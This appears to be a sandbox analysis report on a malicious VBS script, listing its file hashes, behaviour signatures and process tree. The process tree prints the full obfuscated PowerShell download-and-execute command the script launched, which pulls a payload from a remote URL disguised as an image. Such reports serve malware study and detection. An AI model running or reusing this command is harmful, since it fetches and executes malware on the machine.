Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-10-2024 07:17
Static task
static1
Behavioral task
behavioral1
Sample
WWjjNTGdMh.vbs
Resource
win7-20240903-en
windows7-x64
6 signatures
150 seconds
General
-
Target
WWjjNTGdMh.vbs
-
Size
12KB
-
MD5
75f80ac848e2c5c71c5fc4960da7a430
-
SHA1
abcd9316f8a1251220db81d4d075ae659a0fb790
-
SHA256
2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd
-
SHA512
af4db86a398ac31f3b7d909ed62c8ea6b3672db933deadf32ae74e3dac581816372bfb0fc113f5b1aab462291d560516cadd52c655eebd79b7f639467c2c0ce1
-
SSDEEP
48:UvvvvvvvvvvviddddddddddFP5+31HtwLhLtz/zzUSAzzzzzzzzzzzzzzzzzzzze:UvvvvvvvvvvviddddddddddZagKoJ
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2416 powershell.exe 6 2416 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2416 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2268 wrote to memory of 2416 2268 WScript.exe powershell.exe PID 2268 wrote to memory of 2416 2268 WScript.exe powershell.exe PID 2268 wrote to memory of 2416 2268 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WWjjNTGdMh.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://totalhorsehealth.com/wp-admin/images/images/img.jpg'')'.Replace('t4','adString');IEX($t1+$t2+$t3)2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416